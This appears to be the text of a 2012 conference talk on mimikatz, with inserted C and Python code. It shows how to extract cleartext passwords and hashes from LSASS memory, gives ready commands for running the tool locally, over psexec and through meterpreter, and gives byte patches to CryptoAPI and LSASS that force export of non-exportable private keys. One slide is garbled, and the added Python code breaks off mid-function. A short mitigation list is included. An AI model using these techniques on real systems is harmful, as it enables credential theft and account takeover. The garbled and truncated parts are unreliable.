– Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression: it seems cool!
– the user does not have to type their password
– the password is not in the RDP file
– the password is not in the user's secrets
mimikatz / sekurlsa / tspkg : questions (slide 12)
The KB says that for it to work, we must enable « Default credentials » delegation
– "Default credentials: The credentials obtained when the user first logs on to Windows" - https://msdn.microsoft.com/library/bb204773.aspx
  • What? Our User/Domain/Password? | Hash? | Ticket? It seems...
– In all cases, the system seems to be vulnerable to pass-the-...
In what form? Our specs, [MS-CSSP]:
– 2.2.1.2.1 TSPasswordCreds
  • "The TSPasswordCreds structure contains the user's password credentials that are delegated to the server" (or PIN)
        TSPasswordCreds ::= SEQUENCE {
            domainName  [0] OCTET STRING,
            userName    [1] OCTET STRING,
            password    [2] OCTET STRING
        }
– Challenge/response for authentication?
  • Server: YES (TLS, Kerberos)
  • Client: NO, the password is sent to the server...
So the password resides somewhere in memory!
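To make the TSPasswordCreds point concrete, an added C example (not from the slides, not from mimikatz) that encodes the structure above as DER and parses it back: the three fields are plain UTF-16LE OCTET STRINGs under explicit context tags [0]/[1]/[2], so anything that sees the blob outside the TLS channel, or that can reach the LSASS memory it was built from, has the password itself, not a challenge response. The sample domain, user and password are constructed for the demo; the explicit tagging (A0/A1/A2 wrapping an 04) is the CredSSP encoding, the ASCII-only string conversion is a simplification.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Write one DER TLV (tag, length in short or 2-byte long form, value). */
static size_t der_put(uint8_t *out, uint8_t tag, const uint8_t *val, size_t len) {
    size_t n = 0;
    out[n++] = tag;
    if (len < 128) out[n++] = (uint8_t)len;
    else { out[n++] = 0x82; out[n++] = (uint8_t)(len >> 8); out[n++] = (uint8_t)len; }
    memcpy(out + n, val, len);
    return n + len;
}

/* ASCII to UTF-16LE, which is how CredSSP carries the three strings
 * (assumption for the sample: ASCII input only). */
static size_t to_utf16le(const char *s, uint8_t *out) {
    size_t i;
    for (i = 0; s[i]; i++) { out[2 * i] = (uint8_t)s[i]; out[2 * i + 1] = 0; }
    return 2 * i;
}

/* TSPasswordCreds ::= SEQUENCE { domainName [0] OCTET STRING,
 *   userName [1] OCTET STRING, password [2] OCTET STRING }
 * with explicit context tags (A0/A1/A2 wrapping an 04), as CredSSP encodes it. */
size_t encode_ts_password_creds(const char *domain, const char *user,
                                const char *password, uint8_t *out) {
    const char *fields[3] = { domain, user, password };
    uint8_t body[512], u16[256], oct[260];
    size_t blen = 0;
    for (int i = 0; i < 3; i++) {
        size_t ulen = to_utf16le(fields[i], u16);
        size_t olen = der_put(oct, 0x04, u16, ulen);                   /* OCTET STRING */
        blen += der_put(body + blen, (uint8_t)(0xA0 | i), oct, olen);  /* [i] EXPLICIT */
    }
    return der_put(out, 0x30, body, blen);                             /* SEQUENCE */
}

/* Read the TLV header at in[off]: returns header size and sets tag/len,
 * or 0 if the element does not fit inside n bytes. */
static size_t der_get(const uint8_t *in, size_t n, size_t off, uint8_t *tag, size_t *len) {
    if (off + 2 > n) return 0;
    size_t hdr = 2;
    *tag = in[off];
    uint8_t l = in[off + 1];
    if (l < 0x80) *len = l;
    else {
        int k = l & 0x7F;
        if (k < 1 || k > 2 || off + 2 + k > n) return 0;
        *len = 0;
        for (int i = 0; i < k; i++) *len = (*len << 8) | in[off + 2 + i];
        hdr += k;
    }
    return off + hdr + *len <= n ? hdr : 0;
}

/* Pull field 0 (domain), 1 (user) or 2 (password) out of a TSPasswordCreds
 * blob as ASCII. Returns 1 on success, 0 on malformed/truncated input. */
int decode_ts_password_creds(const uint8_t *in, size_t n, int field, char *out, size_t cap) {
    uint8_t tag;
    size_t len, hdr = der_get(in, n, 0, &tag, &len);
    if (!hdr || tag != 0x30) return 0;
    size_t pos = hdr, end = hdr + len;
    for (int i = 0; i < 3 && pos < end; i++) {
        size_t h1 = der_get(in, end, pos, &tag, &len);
        if (!h1 || tag != (0xA0 | i)) return 0;
        size_t inner = pos + h1, ilen;
        size_t h2 = der_get(in, end, inner, &tag, &ilen);
        if (!h2 || tag != 0x04) return 0;
        if (i == field) {
            size_t chars = ilen / 2;
            if (chars >= cap) chars = cap - 1;
            for (size_t c = 0; c < chars; c++) {
                uint8_t lo = in[inner + h2 + 2 * c], hi = in[inner + h2 + 2 * c + 1];
                out[c] = (hi == 0 && lo < 0x80) ? (char)lo : '?';
            }
            out[chars] = '\0';
            return 1;
        }
        pos += h1 + len;
    }
    return 0;
}

int main(void) {
    uint8_t blob[600];
    char s[64];
    /* constructed sample credential, not a capture */
    size_t n = encode_ts_password_creds("vm-w8", "Gentil Kiwi", "waza1234", blob);
    printf("TSPasswordCreds (%zu bytes):", n);
    for (size_t i = 0; i < n; i++) printf(" %02x", blob[i]);
    if (decode_ts_password_creds(blob, n, 2, s, sizeof s)) printf("\npassword field: %s\n", s);
    return 0;
}
```

The decoder bounds every element against the enclosing SEQUENCE rather than the raw buffer, so a truncated or length-lying blob fails cleanly instead of reading past the end; that is the check to keep if this is turned into a parser for captured TSRequest traffic.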
mimikatz / sekurlsa / tspkg : symbols & theory (slide 13)
Let's explore some symbols
– sounds cool... (thanks Microsoft)
Let's imagine a scenario:
– Enumerate all sessions to obtain
  • Username
  • Domain
  • LUID
– Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain
  • TS_CREDENTIAL
– Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
  • TS_PRIMARY_CREDENTIAL with clear text credentials...
    kd> x tspkg!*clear*
    75016d1c  tspkg!TSObtainClearCreds = <no type information>
    kd> x tspkg!*password*
    75011b68  tspkg!TSDuplicatePassword = <no type information>
    75011cd4  tspkg!TSHidePassword = <no type information>
    750195ee  tspkg!TSRevealPassword = <no type information>
    75012fbd  tspkg!TSUpdateCredentialsPassword = <no type information>
    kd> x tspkg!*locate*
    7501158b  tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz / sekurlsa / tspkg : workflow (slide 14)
(diagram) Workflow: LsaEnumerateLogonSessions -> for each LUID -> RtlLookupElementGenericTableAvl on tspkg!TSGlobalCredTable -> KIWI_TS_CREDENTIAL -> pTsPrimary -> KIWI_TS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear

    typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
        PVOID unk0;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Password;
    } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

    typedef struct _KIWI_TS_CREDENTIAL {
    #ifdef _M_X64
        BYTE unk0[108];
    #elif defined _M_IX86
        BYTE unk0[64];
    #endif
        LUID LocallyUniqueIdentifier;
        PVOID unk1;
        PVOID unk2;
        PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
    } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz / sekurlsa / tspkg : demo time (slide 15)
sekurlsa::tspkg
mimikatz / sekurlsa / wdigest : because a clear text password over http/https is not cool (slide 16)
mimikatz / sekurlsa / wdigest : what is it? (slide 17)
"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network [...]" - Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication
"Common Digest Authentication Scenarios:
– Authenticated client access to a Web site
– Authenticated client access using SASL
– Authenticated client access with integrity protection to a directory service using LDAP" - Microsoft, http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool!
– no password over the network, just hashes
– no reversible password in Active Directory: hashes for each realm
  • only with Advanced Digest authentication
mimikatz / sekurlsa / wdigest : what is it? (slide 18)
We speak about hashes, but what hashes?
    H = MD5(HA1:nonce:[...]:HA2)
    • HA1 = MD5(username:realm:password)
    • HA2 = MD5(method:digestURI[...])
Even after login, HA1 may change... the realm comes from the server side and cannot be determined before the Windows logon.
So the WDigest provider must keep the elements to compute responses for different servers:
– Username
– Realm (from the server)
– Password
mimikatz / sekurlsa / wdigest : theory (slide 19)
This time we know:
– that WDigest keeps the password in memory « by protocol », for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
– at offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– let's search for it in WDigest
– the hypothesis seems verified
LsaProtectMemory
– at offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– let's search for it in WDigest
– SpAcceptCredentials takes the clear password in its arguments
  • protects it with LsaProtectMemory
  • updates or inserts data in the doubly linked list wdigest!l_LogSessList
    .text:7409D151  _DigestCalcHA1@8         call dword ptr [eax+0B4h]
    .text:74096C69  _SpAcceptCredentials@16  call dword ptr [eax+0B0h]
mimikatz / sekurlsa / wdigest : workflow (slide 20)
(diagram) Workflow: LsaEnumerateLogonSessions -> for each LUID -> search the linked list wdigest!l_LogSessList for that LUID -> KIWI_WDIGEST_LIST_ENTRY -> LsaUnprotectMemory -> password in clear

    typedef struct _KIWI_WDIGEST_LIST_ENTRY {
        struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
        struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
        DWORD UsageCount;
        struct _KIWI_WDIGEST_LIST_ENTRY *This;
        LUID LocallyUniqueIdentifier;
        [...]
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
        [...]
    } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz / sekurlsa / wdigest : demo time (slide 21)
sekurlsa::wdigest
mimikatz / sekurlsa / livessp : because Microsoft was too good in closed networks (slide 22)
mimikatz / sekurlsa / livessp : how (slide 23)
Actually, I had only used a logical (empirical) approach to search for passwords...
– protocol reading
– symbol searching
~ Boring ~ ... let's be more brutal this time: set a WinDBG trap
    0: kd> !process 0 0 lsass.exe
    PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
        DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
        Image: lsass.exe

    0: kd> .process /i 83569040
    You need to continue execution (press 'g' <enter>) for the context
    to be switched. When the debugger breaks in again, you will be in
    the new process context.
    0: kd> g
    Break instruction exception - code 80000003 (first chance)
    nt!RtlpBreakWithStatusInstruction:
    814b39d0 cc              int     3
    0: kd> .reload /user
    Loading User Symbols
    0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
    0: kd> g
mimikatz / sekurlsa / livessp : how (slide 24)
Let's log in with a Live account on Windows 8.
After credential protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest).
Call stacks caught by the breakpoint (kc 5):
    lsasrv!LsaProtectMemory
    livessp!LiveMakeSupplementalCred
    livessp!LiveMakeSecPkgCredentials
    livessp!LsaApLogonUserEx2
    livessp!SpiLogonUserEx2
        <- our LiveSSP provider

    lsasrv!LsaProtectMemory
    msv1_0!NlpAddPrimaryCredential
    msv1_0!SspAcceptCredentials
    msv1_0!SpAcceptCredentials
        <- yeah, Pass the Hash capability with a Live account too...

    lsasrv!LsaProtectMemory
    tspkg!TSHidePassword
    tspkg!SpAcceptCredentials
        <- a Live user can logon through RDP via SSO

    1: kd> uf /c livessp!LsaApLogonUserEx2
    livessp!LsaApLogonUserEx2 (74781536)
    [...]
      livessp!LsaApLogonUserEx2+0x560 (74781a96):
        call to livessp!LiveCreateLogonSession (74784867)
mimikatz / sekurlsa / livessp : workflow (slide 25)
(diagram) Workflow: LsaEnumerateLogonSessions -> for each LUID -> search the linked list livessp!LiveGlobalLogonSessionList for that LUID -> KIWI_LIVESSP_LIST_ENTRY -> suppCreds -> KIWI_LIVESSP_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear

    typedef struct _KIWI_LIVESSP_LIST_ENTRY {
        struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
        struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        PVOID unk3;
        DWORD unk4;
        DWORD unk5;
        PVOID unk6;
        LUID LocallyUniqueIdentifier;
        LSA_UNICODE_STRING UserName;
        PVOID unk7;
        PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
    } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

    typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
        DWORD isSupp;
        DWORD unk0;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz / sekurlsa (slide 26)
Even if we already have tools for normal accounts, aren't you curious to test one with this trap?
Me: yes!
mimikatz / sekurlsa / kerberos (slide 27)
Let's log in with a normal account.
After credential protection, KerbCreateLogonSession calls:
– NT6: KerbInsertOrLocateLogonSession, to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession, to insert data in KerbLogonSessionList
Call stacks caught by the breakpoint (kc 5):
    lsasrv!LsaProtectMemory
    kerberos!KerbHideKey
    kerberos!KerbCreatePrimaryCredentials
    kerberos!KerbCreateLogonSession
    kerberos!SpAcceptCredentials
        <- Kerberos key part (the ticket part? maybe ;))

    lsasrv!LsaProtectMemory
    kerberos!KerbHidePassword
    kerberos!KerbCreateLogonSession
    kerberos!SpAcceptCredentials
        <- Kerberos part for the password

    lsasrv!LsaProtectMemory
    msv1_0!NlpAddPrimaryCredential
    msv1_0!SspAcceptCredentials
    msv1_0!SpAcceptCredentials

    lsasrv!LsaProtectMemory
    wdigest!SpAcceptCredentials

    lsasrv!LsaProtectMemory
    tspkg!TSHidePassword
    tspkg!SpAcceptCredentials
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz :: sekurlsa :: kerberos (nt5) - workflow

LsaEnumerateLogonSessions, then for each LUID:
  1. search the doubly-linked list kerberos!KerbLogonSessionList for the KIWI_KERBEROS_LOGON_SESSION whose LocallyUniqueIdentifier matches
  2. LsaUnprotectMemory on its Password field gives the password in clear

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0; PVOID unk1; PVOID unk2;
    DWORD unk3; DWORD unk4;
    PVOID unk5; PVOID unk6; PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9; DWORD unk10;
    PVOID unk11;
    DWORD unk12; DWORD unk13;
    PVOID unk14; PVOID unk15; PVOID unk16;
    [...]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa - demo time

Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos - "hu?"

Ok. It works...
But why?
  - Not at every logon on NT5 (an unlock can be needed)

From my understanding of Microsoft explanations:
  - no need of passwords for the Kerberos protocol...
  - all is based on the hash (not very sexy either)

Microsoft's implementation of Kerberos is full of logical...
  - For password auth:
    * the password hash is the shared secret, but the password is kept in memory
  - For full smartcard auth:
    * No password on the client
    * No hash on the client
    * ... NTLM hash on the client anyway: the KDC sends it back as a gift
mimikatz :: sekurlsa - without injection

All passwords in memory are encrypted, but in a reversible way, since they have to be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them.
  - This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) into the LSASS process, to benefit from its keys when we called it.

Can it be fun to decrypt outside the process?
  - Yes it is... no more injection, just reading the memory of the LSASS process...

mimikatz can load lsasrv.dll too and "imports" the keys LSASS initialized:
  - When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are inside LSASS.
mimikatz :: sekurlsa :: LsaEncryptMemory - NT5

Depending on the size of the secret, LsaEncryptMemory uses:
  - RC4
  - DESX

Key material living in lsass (lsasrv.dll), which mimikatz copies into its own instance of lsasrv.dll:
  - g_cbRandomKey : DWORD (256)
  - g_pRandomKey  : pointer to BYTE[g_cbRandomKey]
  - g_pDESXKey    : pointer to BYTE[144]
  - g_Feedback    : BYTE[8]
mimikatz :: sekurlsa :: LsaEncryptMemory - NT6

Depending on the size of the secret, LsaEncryptMemory uses:
  - 3DES
  - AES

Key material living in lsass (lsasrv.dll), which mimikatz copies into its own instance of lsasrv.dll:
  - InitializationVector : BYTE[16]
  - h3DesKey : PKIWI_BCRYPT_KEY
  - hAesKey  : PKIWI_BCRYPT_KEY

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0; DWORD unk1; DWORD unk2; DWORD unk3;
    PVOID unk4;
    BYTE data;   /* ... etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;
mimikatz :: sekurlsa - memo

Security Packages

  Package          Symbol                                  Type
  tspkg            tspkg!TSGlobalCredTable                 RTL_AVL_TABLE
  wdigest          wdigest!l_LogSessList                   LIST_ENTRY
  livessp          livessp!LiveGlobalLogonSessionList      LIST_ENTRY
  kerberos (nt5)   kerberos!KerbLogonSessionList           LIST_ENTRY
  kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable    RTL_AVL_TABLE
  msv1_0           lsasrv!LogonSessionList                 LIST_ENTRY
                   lsasrv!LogonSessionListCount            ULONG

Protection Keys

  Key (NT 5)   Symbols
  RC4          lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
  DESX         lsasrv!g_pDESXKey, lsasrv!g_Feedback

  Key (NT 6)   Symbols
  IV           lsasrv!InitializationVector
  3DES         lsasrv!h3DesKey
  AES          lsasrv!hAesKey
mimikatz :: sekurlsa - memo

Some commands:
  mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

Demo output (translated from the French build):

  mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */
  // http://blog.gentilkiwi.com/mimikatz

  mimikatz # privilege::debug
  Request to ENABLE privilege : SeDebugPrivilege : OK

  mimikatz # sekurlsa::logonPasswords full

  Authentication Id      : 0;234870
  Authentication package : NTLM
  Primary user           : Gentil Kiwi
  Authentication domain  : vm-w8-rp-x
      msv1_0 :
       * User      : Gentil Kiwi
       * Domain    : vm-w8-rp-x
       * LM hash   : d0e9aee149655a6075e4540af1f22d3b
       * NTLM hash : cc36cf7a8514893efccd332446158b1a
      kerberos :
       * User      : Gentil Kiwi
       * Domain    : vm-w8-rp-x
       * Password  : waza1234
      wdigest :
       * User      : Gentil Kiwi
       * Domain    : vm-w8-rp-x
       * Password  : waza1234
      tspkg :
       * User      : Gentil Kiwi
       * Domain    : vm-w8-rp-x
       * Password  : waza1234
      livessp : n.t. (LUID KO)
mimikatz :: sekurlsa - what we can do

Basics
  - No physical access to the computer (first step to pass-the-hash, then pass-the-pass)
  - No admin rights, system rights, debug privileges (...)
  - Disable local admin accounts
  - Strong passwords (haha, it was a joke, so useless here)
  - For privileged accounts, network logon instead of interactive (when possible)
  - Audit: pass-the-hash leaves traces and can lock accounts
  - No admin rights, system rights, debug privileges... even for VIPs
  - Use a separate network (or forest) for privileged tasks

More in depth
  - Force strong authentication (SmartCard & Token) $ / euro
  - Short validity for Kerberos tickets
  - No delegation
  - Disable NTLM (available with NT6)
  - No exotic stuff:
    * biometrics (it keeps the password somewhere and pushes it to Windows)
    * single sign on
  - Stop shared secrets for authentication, push public/private stuff (like keys ;))
  - Take the opportunities to drop backward compatibility
  - Disable faulty providers
    * Is it supported by Microsoft?
    * Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto - what is it?

A little module (mod_mimikatz_crypto) that I wrote to:
  - play with Windows Cryptographic API, CNG and RSA keys
  - automate the export of certificates/keys
    * even those which are "not" exportable

What the crypto module can do:
  - List
    * Providers
    * Stores
    * Certificates
    * Keys
  - Export
    * Certificates
      - public part in DER format
      - with private keys in PFX format
    * Private keys in PVK format (it's cool, OpenSSL can deal with it too)
  - Patch
    * CryptoAPI, in the mimikatz context
    * CNG, in the LSASS context (again!)
mimikatz :: crypto - how it's protected

Private keys are DPAPI protected
  - You cannot reuse private key files on another computer
    * At least not without the master keys and/or the users' passwords

Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
  - Yes, a computer/server opens a "session"

Export/Usage can be limited by:
  - Password, Popup: a constraint for most users, and unavailable for computer keys
  - EXPORT/ARCHIVE flag not present

  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi - how it works

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
  - http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here...) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard reader, ...
  - cryptdll.dll, rsaenh.dll, ...

Processes deal with cryptographic keys through this API...
mimikatz :: crypto :: capi - how it's exported (simple level)

Flowchart (titled "PLAYSKOOL" in the deck). Everything happens inside the calling process, where CryptoAPI and the RSA CSP are loaded:
  1. the process as
ks the CSP to export a key
  2. the CSP loads the private key and DPAPI-decodes it
  3. the CSP checks whether the key is exportable:
     - yes : the exported key is returned
     - no  : NTE_BAD_KEY_STATE
mimikatz :: crypto :: patchcapi - because I own my process

When we want to export a certificate with its private key (or only the key), it goes through rsaenh!CPExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.

Before any patch, both mimikatz and certutil fail on a non-exportable key (output translated from French):

  mimikatz # crypto::exportCertificates
  Location : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
   - Benjamin Delpy
      Key container : 470ADFBA-8718-4014-B05E-B30776B75A03
      Provider      : Microsoft Enhanced Cryptographic Provider v1.0
      Type          : AT_KEYEXCHANGE
      Exportable    : NO
      Key size      : 2048
      Private export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Key not valid for use in specified state.
      Public export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

  ================ Certificate 0 ================
  Serial Number: 112169417a1c3ef46a301f99385f50680fa0
  Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
  Subject: CN=Benjamin Delpy, C=FR
  Non-root Certificate
  Cert Hash(sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
    Key Container = 470ADFBA-8718-4014-B05E-B30776B75A03
    Provider = Microsoft Enhanced Cryptographic Provider v1.0
  Private key is NOT exportable
  Encryption test passed
  CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
  CertUtil: Key not valid for use in specified state.
mimikatz :: crypto :: patchcapi - because I own my process

So what? A module in my own process returns that I can't do something?
CryptoAPI is in my memory space, let's patch it!

I wrote "4" bytes in my memory space: two sites, two bytes each. The jnz opcode 0F 85 becomes nop + jmp (90 E9); the rel32 displacement stays as it was, because the 5-byte jmp preceded by a nop ends at the same address as the 6-byte jnz:

  .text:0AC0B7CB  0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
  .text:0AC0B7CB  90                   nop
  .text:0AC0B7CC  E9 33 C7 FF FF       jmp  continue_key_export_or_archive

  .text:0AC1F749  0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
  .text:0AC1F749  90                   nop
  .text:0AC1F74A  E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi - demo time

Import, export, import as not exportable... export!
mimikatz :: crypto :: patchcapi - limitations

Because:
  - I'm lazy
  - In the majority of real-life cases I've seen RSA keys
    * Elliptic Curve a little...

mimikatz crypto::patchcapi only deals with:
  - Microsoft Base Cryptographic Provider v1.0
  - Microsoft Enhanced Cryptographic Provider v1.0
  - Microsoft Enhanced RSA and AES Cryptographic Provider
  - Microsoft RSA SChannel Cryptographic Provider
  - Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll
mimikatz :: crypto :: cng - how it works

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
  - http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time key operations are not made in the "user" process context.
Processes use RPC to call "Key Isolation service" (keyiso) functions.

It seems more secure than CryptoAPI...
  - It is, but it's not perfect...
mimikatz :: crypto :: cng - how it's exported (simple level)

Flowchart (titled "PLAYSKOOL" in the deck). The calling process only talks to CNG; the key work happens in the KeyIso service inside the LSASS process (on NT6 a SYSTEM process protected by its mandatory label: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP | SYSTEM_MANDATORY_LABEL_NO_READ_UP):
  1. the process asks CNG to export a key
  2. CNG forwards the request over RPC to KeyIso (LSASS)
  3. KeyIso loads the private key and DPAPI-decodes it
  4. KeyIso checks whether the key is exportable:
     - yes : the exported key is returned over RPC
     - no  : NTE_NOT_SUPPORTED
mimikatz :: crypto :: patchcng - because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.

Before the patch (output translated from French):

  mimikatz # crypto::exportKeys
  [user] CNG keys
   - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Exportable : NO
      Key size   : 2048
      Private export to 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
      mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK (0x80090029) The requested operation is not supported.
mimikatz :: crypto :: patchcng - because sometimes I own LSASS

This time the checks and the keys are in the LSASS process... and what?
I wrote "1" byte in LSASS memory space: the short jnz opcode 75 becomes a short jmp, EB, and the rel8 displacement stays:

  .text:6C815210  75 1C    jnz  short continue_key_export
  .text:6C815210  EB 1C    jmp  short continue_key_export
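Added example (not the deck's or mimikatz's code) of the two crypto::patch* edits, the CPExportKey sites and the SPCryptExportKey site, performed on constructed byte buffers instead of a live rsaenh.dll mapping or LSASS memory. It decodes the conditional branch at the slide addresses, rewrites it the same way (0F 85 rel32 to 90 E9 rel32, 75 rel8 to EB rel8), checks that the branch target did not move and that the byte signature matched exactly once. Only the instruction bytes and addresses come from the slides; the module bases (0x0AC00000, 0x6C810000) and the 0xCC filler are assumptions for the sample.

```python
import struct


def decode_branch(code, base, off):
    """Decode the jnz/jmp at `off`; return (mnemonic, length, absolute target)."""
    b0, b1 = code[off], code[off + 1]
    if (b0, b1) in ((0x0F, 0x85), (0x90, 0xE9)):            # jnz rel32, or nop;jmp rel32 once patched
        rel = struct.unpack_from("<i", code, off + 2)[0]
        name = "jnz" if b0 == 0x0F else "nop;jmp"
        return name, 6, (base + off + 6 + rel) & 0xFFFFFFFF
    if b0 in (0x75, 0xEB):                                  # jnz short / jmp short rel8
        rel = struct.unpack_from("<b", code, off + 1)[0]
        name = "jnz short" if b0 == 0x75 else "jmp short"
        return name, 2, (base + off + 2 + rel) & 0xFFFFFFFF
    raise ValueError(f"no supported branch at {base + off:#010x}")


def patch_jnz_to_jmp(code, base, off):
    """Make the conditional branch unconditional without moving its target; return bytes written."""
    mnemonic, _, target = decode_branch(code, base, off)
    if mnemonic == "jnz":
        # 0F 85 rel32 -> 90 E9 rel32: nop + jmp rel32 ends at the same address as
        # the original 6-byte jnz, so the displacement is reused untouched.
        code[off:off + 2] = b"\x90\xE9"
        written = 2
    elif mnemonic == "jnz short":
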